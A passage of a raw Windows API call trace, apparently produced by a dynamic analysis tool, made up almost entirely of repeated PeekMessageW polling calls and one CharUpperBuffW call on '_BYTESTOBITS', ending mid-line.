[0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.166] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.185] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.186] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.187] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.188] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.188] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.189] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.216] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, 